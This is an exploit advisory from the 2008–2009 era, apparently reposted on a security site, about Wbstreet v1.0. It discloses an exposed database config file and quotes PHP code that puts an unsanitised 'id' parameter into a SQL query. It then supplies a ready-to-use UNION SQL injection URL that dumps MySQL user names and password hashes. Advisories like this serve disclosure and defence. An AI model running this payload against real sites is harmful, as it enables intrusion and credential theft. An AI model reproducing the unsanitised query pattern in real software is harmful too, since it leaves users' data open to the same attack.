Wbstreet v.1.0 (SQL/DD) Multiple Remote Vulnerabilities

2009.01.26
Credit: CWH
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

=================================================================== Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability =================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 4 December 2008 SITE : cwh.citec.us ##################################################### APPLICATION : Wbstreet VERSION : v.1.0 VENDOR : www.phpstreet.com DOWNLOAD : www.ohlanla.com/Dowsload/177254922054.zip ##################################################### -- Remote Database Disclosure -- [+] http://[Target]/[path]/connect.inc -- Remote SQL Injection --- ----------------- Vulnerable Code ----------------- if(isset($_GET['id'])){ $id=$_GET['id']; } . . . . <? $rs=mysql_db_query($db_name, "select * from topic where id=$id"); <<<< Bug !!!! $row=mysql_fetch_array($rs); ?> ---------- Exploit ---------- [+] http://[Target]/[path]/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user ##################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #####################################################################

References:

http://xforce.iss.net/xforce/xfdb/47073
http://www.securityfocus.com/bid/32635
http://www.milw0rm.com/exploits/7337


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top